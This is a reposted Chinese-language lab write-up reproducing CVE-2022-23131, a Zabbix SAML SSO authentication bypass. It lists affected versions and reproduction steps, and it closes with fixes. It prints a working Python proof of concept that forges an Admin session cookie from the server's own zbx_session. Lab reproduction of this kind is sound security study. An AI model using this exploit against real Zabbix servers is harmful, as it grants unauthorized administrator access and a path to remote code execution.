一、漏洞概述
Zabbix 是一個非常流行的開源監控平臺,用于收集、集中和跟蹤整個基礎設施中的 CPU 負載和網路流量等指標,它與 Pandora FMS 和 Nagios 等解決方案非常相似,由于其受歡迎程度、功能和在大多數公司網路中的特權地位,Zabbix 是威脅參與者的高調目標,
Zabbix對客戶端提交的Cookie會話存在不安全的存盤方式,導致在啟動SAML SSO認證模式的前提下,惡意用戶可通過構造特殊請求繞過認證,獲取管理員權限,進而可實作RCE,
——https://blog.csdn.net/weixin_46944519/article/details/123131257
二、影響版本
- 4.0.36
- 5.0.18
- 5.4.8
- 6.0.0alpha1
三、漏洞原理
- 什么是SAML SSO 身份驗證
-
大白話就是當偽造的cookie中存在saml_data時,獲取username_attribute的資料,如果該用戶真實存在則會生成一個sessionid從而實作身份認證繞過,
大佬鏈接:https://blog.csdn.net/weixin_46944519/article/details/123131257
四、漏洞復現環境
Kali Linux + Vulfocus
滲透機:Kali Linux
靶機:Vulfocus
五、實驗步驟
1.開啟鏡像環境,訪問頁面
2.開啟kali自帶的DirBuster子目錄爆破工具,找到存在一個/zabbix/index.php路徑
3.訪問該URL
4.使用EditThisCookie插件,準備換Admin的Cookie
5.使用該poc獲得加密后的PayLoad(先貼上大佬的poc,后面再自己嘗試寫一個~)
1 # coding 2 3 import sys 4 import requests 5 import re,base64,urllib.parse,json 6 # 禁用警告 7 from requests.packages.urllib3.exceptions import InsecureRequestWarning 8 requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 9 10 def runPoc(url): 11 response = requests.get(url,verify=False) 12 13 cookie = response.headers.get("Set-Cookie") 14 15 sessionReg = re.compile("zbx_session=(.*?);") 16 try: 17 session = re.findall(sessionReg,cookie)[0] 18 19 base64_decode = base64.b64decode(urllib.parse.unquote(session,encoding="utf-8")) 20 session_json = json.loads(base64_decode) 21 22 payload = '{"saml_data":{"username_attribute":"Admin"},"sessionid":"%s","sign":"%s"}'%(session_json["sessionid"],session_json["sign"]) 23 24 print("未加密Payload:" + payload) 25 print('\n') 26 payload_encode = urllib.parse.quote(base64.b64encode(payload.encode())) 27 28 print("加密后Payload:" + payload_encode) 29 30 except IndexError: 31 print("[-] 不存在漏洞") 32 33 if __name__ == '__main__': 34 try: 35 url = sys.argv[1] 36 runPoc(url) 37 except IndexError: 38 print(""" 39 Use: python CVE-2022-23131.py http://xxxxxxxxx.com 40 41 By:MrHatSec""")
————https://blog.csdn.net/MrHatSec/article/details/123997989
6.切換Cookie,即可實作繞過登錄
7.很尷尬的是沒找到flag……有哪位同仁找到的話記得和我說一下
六、修復方式
1、禁用 SAML 身份驗證
2、升級安全版本:https://support.zabbix.com/browse/ZBX-20350
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/489751.html
標籤:其他